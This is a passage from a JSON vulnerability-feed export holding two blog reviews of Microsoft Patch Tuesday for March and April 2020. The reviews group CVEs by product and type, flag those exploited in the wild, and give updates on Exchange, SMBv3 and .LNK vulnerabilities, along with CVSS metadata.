In each Patch Tuesday there are RCEs in Internet Explorer and Microsoft Edge. And usually the problem is in the Chakra JavaScript engine. This time there are 13 RCE CVEs in ChakraCore. They can potentially be exploited if you visit a malicious site: CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0847, CVE-2020-0848.

Another group of RCEs is related to media files. These are vulnerabilities in:

 * Windows Graphics Device Interface (GDI) (CVE-2020-0881, CVE-2020-0883)
 * Windows Media Foundation (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)

They can also be used in a web-based attack, where an attacker convinces a user to visit a malicious website.

There are also RCEs in Microsoft Word (CVE-2020-0850, CVE-2020-0851, CVE-2020-0852, CVE-2020-0855, CVE-2020-0892). One of them (CVE-2020-0852) can be exploited simply by previewing a malicious file in Microsoft Outlook.

But the most interesting issue is related to .LNK file processing (CVE-2020-0684). When a user opens a malicious share or removable drive, Windows Explorer parses the .LNK file and the malicious binary executes with the rights of the local user.

### Elevation of Privilege

And finally, there are many privilege escalation vulnerabilities that use different mechanisms, but all of them could be used to start processes with higher permissions after the initial user login.
These vulnerabilities are in: \n\n * Windows Working Folder Service (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866 and CVE-2020-0897)\n * Win32k (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n## February goldies\n\nIn a February Patch Tuesday,[ I mentioned two the most interesting vulnerabilities](<https://avleonov.com/2020/02/13/microsoft-patch-tuesday-february-2020/>). Let's see if something has changed with them in a month.\n\n**Microsoft Exchange server seizure** CVE-2020-0688. By sending a malicious email message the attacker can run commands on a vulnerable Exchange server as the system user (and monitor email communications). \u201cthe attacker could completely take control of an Exchange server through a single e-mail\u201d. This vulnerability now has several exploits, including one in Metasploit "Exchange Control Panel ViewState Deserialization". And there is news that this Microsoft Exchange Server Flaw Exploited in APT Attacks. You can see you all these [updates at Vulners.com](<https://vulners.com/cve/CVE-2020-0688>). \n\nThe second one was **Mysterious Windows RCE** CVE-2020-0662. \u201cTo exploit the vulnerability, an attacker who has a domain user account could create a specially crafted request, causing Windows to execute arbitrary code with elevated permissions.\u201d Without needing to directly log in to the affected device! 
For this vulnerability, nothing has changed in a month.\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-22T01:15:34", "type": "avleonov", "title": "Microsoft Patch Tuesday March 2020: a new record was set, SMBv3 \u201cWormable\u201d RCE and updates for February goldies", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0662", "CVE-2020-0684", "CVE-2020-0688", "CVE-2020-0768", "CVE-2020-0777", "CVE-2020-0788", "CVE-2020-0796", "CVE-2020-0797", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0807", "CVE-2020-0809", "CVE-2020-0823", "CVE-2020-0825", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0850", "CVE-2020-0851", "CVE-2020-0852", "CVE-2020-0855", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0869", "CVE-2020-0877", "CVE-2020-0881", "CVE-2020-0883", "CVE-2020-0887", "CVE-2020-0892", "CVE-2020-0897"], "modified": "2020-03-22T01:15:34", "id": "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "href": 
"http://feedproxy.google.com/~r/avleonov/~3/BTbjjTQwEtQ/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T08:03:36", "description": "## Easiest task ever?\n\nMaking reviews of Microsoft Patch Tuesday vulnerabilities should be an easy task. All vulnerability data is publicly available. Even better, dozens of reviews have already been written. Just read them, combine and post. Right? \n\n\n\nNot really. In fact it is quite boring and annoying. It may be fun to write about vulnerabilities that were already used in some real attacks. But this is a very small part of all vulnerabilities. What about the more than a hundred others? They are like \u201csome vulnerability in some component may be used in some attack (or may be not)\u201d. If you describe each of them, no one will read or listen to this. \n\nYou must choose what to highlight. And when I am reading the reports from [Tenable](<https://www.tenable.com/blog/microsoft-april-2020-patch-tuesday-addresses-113-cves-including-adobe-type-manager-library>), [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>) and [ZDI](<https://www.thezdi.com/blog/2020/4/14/the-april-2020-security-update-review>), I see that they choose very different groups of vulnerabilities, pretty much randomly.\n\n## My classification script\n\nThat's why I created a script that takes Patch Tuesday CVE data from microsoft.com and visualizes it, giving me a helicopter view of what can be interesting there. With nice grouping by vulnerability type and product, with custom icons for vulnerability types, coloring based on severity, etc.\n\n## Exploited in the wild\n\nApril 2020 Microsoft Patch Tuesday was published on 14.04.2020 and addressed 113 CVEs. 2 CVEs fewer than in March, but still too many to discuss them separately. 
18 CVEs are critical (other reports say 19, but you can count it yourself) and 3 were exploited in the wild. These 3 are the most interesting; I got them by the "exploited" parameter in Microsoft CVE data.\n\n### Exploitation detected (3)\n\n#### Remote Code Execution\n\n * Adobe Font Manager Library ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>))\n\n#### Elevation of Privilege\n\n * Windows Kernel ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>))\n\nMicrosoft has finally released a patch for the Adobe Type Manager vulnerability (CVE-2020-1020). The advisory [ADV200006](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006>) appeared on the Microsoft website on 23.03.2020, 3 weeks before this patch. The advisory stated that this vulnerability was used in targeted attacks in the wild. That's why it was discussed a lot. The idea is simple. If you open a special file or preview it in Explorer, remote code execution will occur. It is noted that previewing it in Microsoft Outlook is safe. This vulnerability is great for phishing attacks; in addition, it is also possible to exploit it through Web Distributed Authoring and Versioning (WebDAV). It is an extension of HTTP that allows clients to perform remote Web content authoring operations. It is used, for example, in Microsoft SharePoint or ownCloud. And Microsoft claims that exploitation through WebDAV is the most likely attack vector.\n\nI called this vulnerability "confusing" in the title because:\n\n> To be clear and despite its name, this is *not* Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. 
After that, Microsoft took 100% responsibility for maintaining the code.\n> \n> -- Rosyna Keller (@rosyna) [March 23, 2020](<https://twitter.com/rosyna/status/1242156545346916352?ref_src=twsrc%5Etfw>)\n\n 1. It has "Adobe" in the name, but is not really related to Adobe. Adobe gave Microsoft the source code of ATM Light for inclusion in Windows 2000/XP. Microsoft maintained this source code after that.\n 2. Microsoft initially stated that the RCE exists in 40 versions of Windows, from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019. And this is huge. But then they added that exploitation was detected only for Windows 7. And they "do not recommend that IT administrators running Windows 10 implement the workarounds described" in the advisory. For Windows Server 2016 and Windows Server 2019 the vulnerability is only "Important", not "Critical". And the most vulnerable systems won't get the updates by default: "to receive the security update for this vulnerability for Windows 7, Windows Server 2008, or Windows Server 2008 R2 you must have an ESU license". Yet another good reason to upgrade to a newer version.\n 3. The CVE number for this vulnerability was only assigned 3 weeks after it became publicly known. Before that, everyone called it by the advisory ID ADV200006. So, the CVE is not the ultimate identifier for vulnerabilities. And if you use only CVEs, some vulnerabilities will be out of scope. \n\nAnother vulnerability in the Adobe Font Manager Library (CVE-2020-0938) is very similar to the previous one, CVE-2020-1020, although it impacts a different font renderer.\n\nThe last exploited vulnerability is the Elevation of Privilege (EoP) in the Windows kernel (CVE-2020-1027). To exploit the vulnerability, a locally authenticated attacker would need to run a specially crafted application. 
Here too, all versions of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019 are vulnerable.\n\n> We discovered CVE-2020-1027 being exploited in the wild and reported it on 23 March under a 7-day deadline (used only for actively exploited bugs). Microsoft asked for an extension due to current global circumstances and we agreed. Patch details at <https://t.co/VF3SqXHYV9> (1/2)\n> \n> -- Tim Willis (@itswillis) [April 14, 2020](<https://twitter.com/itswillis/status/1250116355602419713?ref_src=twsrc%5Etfw>)\n\n## More likely to be exploited\n\nWhat else can be interesting? I filtered the CVEs with the "Exploitation more likely" flag for current and older versions. \n\nAs you can see, the most interesting vulnerability is the Scripting Engine Memory Corruption Vulnerability (CVE-2020-0968), which in fact affects Internet Explorer. An attacker can make a specially crafted website that is designed to exploit the vulnerability through Internet Explorer, or use an embedded ActiveX control in an application or Microsoft Office document. 
As a result, an attacker can execute arbitrary code in the context of the current user.\n\n### Exploitation more likely (7)\n\n#### Remote Code Execution\n\n * Internet Explorer ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>))\n\n#### Elevation of Privilege\n\n * DirectX ([CVE-2020-0784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0784>), [CVE-2020-0888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0888>))\n * Windows Graphics Component ([CVE-2020-1004](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1004>))\n * Windows Kernel ([CVE-2020-0956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0956>), [CVE-2020-0957](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0957>), [CVE-2020-0958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0958>))\n\nThe other vulnerabilities that are more likely to be exploited are Elevations of Privilege in DirectX, Windows Graphics Component and Windows Kernel. Not much information is available for them. "An attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system".\n\n## Groups by product\n\nWhat about the other 103 vulnerabilities that, according to Microsoft, are less likely to be exploited? 
I made groups for products with more than 5 vulnerabilities.\n\n### Other Product based (52)\n\n#### Jet Database Engine\n\n * Remote Code Execution ([CVE-2020-0889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0889>), [CVE-2020-0953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0953>), [CVE-2020-0959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0959>), [CVE-2020-0960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0960>), [CVE-2020-0988](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0988>), [CVE-2020-0992](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0992>), [CVE-2020-0994](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0994>), [CVE-2020-0995](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0995>), [CVE-2020-0999](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0999>), [CVE-2020-1008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1008>))\n\n#### Media Foundation\n\n * Memory Corruption ([CVE-2020-0948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0948>), [CVE-2020-0949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0949>), [CVE-2020-0950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0950>))\n * Information Disclosure ([CVE-2020-0937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0937>), [CVE-2020-0939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0939>), [CVE-2020-0945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0945>), [CVE-2020-0946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0946>), 
[CVE-2020-0947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0947>))\n\n#### Microsoft SharePoint\n\n * Remote Code Execution ([CVE-2020-0920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0920>), [CVE-2020-0971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0971>), [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>))\n * Cross Site Scripting ([CVE-2020-0923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0923>), [CVE-2020-0924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0924>), [CVE-2020-0925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0925>), [CVE-2020-0926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0926>), [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>), [CVE-2020-0930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0930>), [CVE-2020-0933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0933>), [CVE-2020-0954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0954>), [CVE-2020-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0973>), [CVE-2020-0978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0978>))\n * Spoofing ([CVE-2020-0972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0972>), 
[CVE-2020-0975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0975>), [CVE-2020-0976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0976>), [CVE-2020-0977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0977>))\n\n#### Windows\n\n * Denial of Service ([CVE-2020-0794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0794>))\n * Elevation of Privilege ([CVE-2020-0934](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0934>), [CVE-2020-0983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0983>), [CVE-2020-1009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1009>), [CVE-2020-1011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1011>), [CVE-2020-1015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015>))\n\n#### Windows Kernel\n\n * Elevation of Privilege ([CVE-2020-0913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0913>), [CVE-2020-1000](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1000>), [CVE-2020-1003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1003>))\n * Information Disclosure ([CVE-2020-0699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0699>), [CVE-2020-0821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0821>), [CVE-2020-0955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0955>), [CVE-2020-0962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0962>), [CVE-2020-1007](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1007>))\n\nSo, the most interesting groups are Jet Database Engine and Microsoft SharePoint, both of which have RCEs. 
\n\n## Groups by vulnerability type\n\nI combined all other vulnerabilities in different products by vulnerability type. There is an interesting EoP in OneDrive for Windows, but "most customers have been protected from this vulnerability because OneDrive has its own updater that periodically checks and updates the OneDrive binary".\n\n### Other Vulnerability Type based (51)\n\n#### Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-0969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0969>), [CVE-2020-0970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0970>))\n * Dynamics Business Central ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>))\n * GDI+ ([CVE-2020-0964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0964>))\n * Microsoft Excel ([CVE-2020-0906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0906>), [CVE-2020-0979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0979>))\n * Microsoft Graphics ([CVE-2020-0687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0687>))\n * Microsoft Graphics Components ([CVE-2020-0907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0907>))\n * Microsoft Office ([CVE-2020-0760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0760>), [CVE-2020-0991](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0991>))\n * Microsoft Office Access Connectivity Engine ([CVE-2020-0961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0961>))\n * Microsoft Windows Codecs Library ([CVE-2020-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0965>))\n * Microsoft Word ([CVE-2020-0980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0980>))\n * 
VBScript ([CVE-2020-0895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0895>), [CVE-2020-0966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0966>), [CVE-2020-0967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0967>))\n * Windows Hyper-V ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>))\n\n#### Authentication Bypass\n\n * Microsoft YourPhone Application for Android ([CVE-2020-0943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0943>))\n\n#### Denial of Service\n\n * Windows DNS ([CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>))\n\n#### Elevation of Privilege\n\n * Connected User Experiences and Telemetry Service ([CVE-2020-0942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0942>), [CVE-2020-0944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0944>), [CVE-2020-1029](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1029>))\n * Microsoft (MAU) Office ([CVE-2020-0984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0984>))\n * Microsoft Defender ([CVE-2020-0835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0835>), [CVE-2020-1002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1002>))\n * Microsoft RMS Sharing App for Mac ([CVE-2020-1019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1019>))\n * Microsoft Remote Desktop App for Mac ([CVE-2020-0919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0919>))\n * Microsoft Visual Studio ([CVE-2020-0899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0899>))\n * Microsoft Windows Update Client 
([CVE-2020-1014](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1014>))\n * OneDrive for Windows ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>))\n * Visual Studio Extension Installer Service ([CVE-2020-0900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0900>))\n * Windows Hyper-V ([CVE-2020-0917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0917>), [CVE-2020-0918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0918>))\n * Windows Push Notification Service ([CVE-2020-0940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0940>), [CVE-2020-1001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1001>), [CVE-2020-1006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1006>), [CVE-2020-1017](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1017>))\n * Windows Scheduled Task ([CVE-2020-0936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0936>))\n * Windows Update Stack ([CVE-2020-0985](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0985>), [CVE-2020-0996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0996>))\n * Windows Work Folder Service ([CVE-2020-1094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1094>))\n\n#### Security Feature Bypass\n\n * MSR JavaScript Cryptography Library ([CVE-2020-1026](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1026>))\n * Windows Token ([CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>))\n\n#### Information Disclosure\n\n * Microsoft Dynamics Business Central/NAV 
([CVE-2020-1018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1018>))\n * Microsoft Graphics Component ([CVE-2020-0982](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0982>), [CVE-2020-0987](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0987>), [CVE-2020-1005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1005>))\n * Windows GDI ([CVE-2020-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0952>))\n * Windows Push Notification Service ([CVE-2020-1016](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1016>))\n\n#### Cross Site Scripting\n\n * Microsoft Dynamics 365 (On-Premise) ([CVE-2020-1049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1049>), [CVE-2020-1050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1050>))\n\nZero Day Initiative recommends noting the Denial of Service in the Windows DNS service (CVE-2020-0993), "considering the damage that could be done by an unauthenticated attacker". At the same time, the Microsoft website says: "To exploit the vulnerability, an **authenticated** attacker could send malicious DNS queries to a target, resulting in a denial of service". It seems like a mistake by either ZDI or MS, but it's worth mentioning.\n\n## Updates for older vulners\n\nSo, that's it for April Patch Tuesday. What about the interesting vulnerabilities from February and March?\n\n 1. CVE-2020-0796 - Windows SMBv3 Client/Server Remote Code Execution Vulnerability. A new exploit is now available for this vulnerability; it's even in Metasploit. But it's not the one you have probably waited for. It does not attack remote hosts; it's [a local exploit for "(hopefully privileged) payload execution"](<https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2020_0796_SMBGHOST>). 
\n**upd.** While I was working on this post I missed the news about CVE-2020-0796 RCE POC by Ricerca Security. The code is not available, here is [technical description](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) and [video](<https://vimeo.com/409855578>).\n 2. CVE-2020-0688 - Microsoft Exchange server "single e-mail" seizure. Exploit exists. Rapid7 made a [nice report](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>) "What we found was that **at least** 357,629 (82.5%) of the 433,464 Exchange servers we observed were known to be vulnerable."\n 3. CVE-2020-0684 - .LNK files processing. Nothing new.\n 4. CVE-2020-0662 - Mysterious Windows RCE. Nothing new.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-26T01:24:38", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0662", "CVE-2020-0684", "CVE-2020-0687", 
"CVE-2020-0688", "CVE-2020-0699", "CVE-2020-0760", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0796", "CVE-2020-0821", "CVE-2020-0835", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0899", "CVE-2020-0900", "CVE-2020-0906", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0919", "CVE-2020-0920", "CVE-2020-0923", "CVE-2020-0924", "CVE-2020-0925", "CVE-2020-0926", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0930", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0933", "CVE-2020-0934", "CVE-2020-0935", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0943", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0954", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0961", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0971", "CVE-2020-0972", "CVE-2020-0973", "CVE-2020-0974", "CVE-2020-0975", "CVE-2020-0976", "CVE-2020-0977", "CVE-2020-0978", "CVE-2020-0979", "CVE-2020-0980", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0984", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0991", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1002", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1018", "CVE-2020-1019", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1026", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1049", "CVE-2020-1050", "CVE-2020-1094"], "modified": "2020-04-26T01:24:38", "id": 
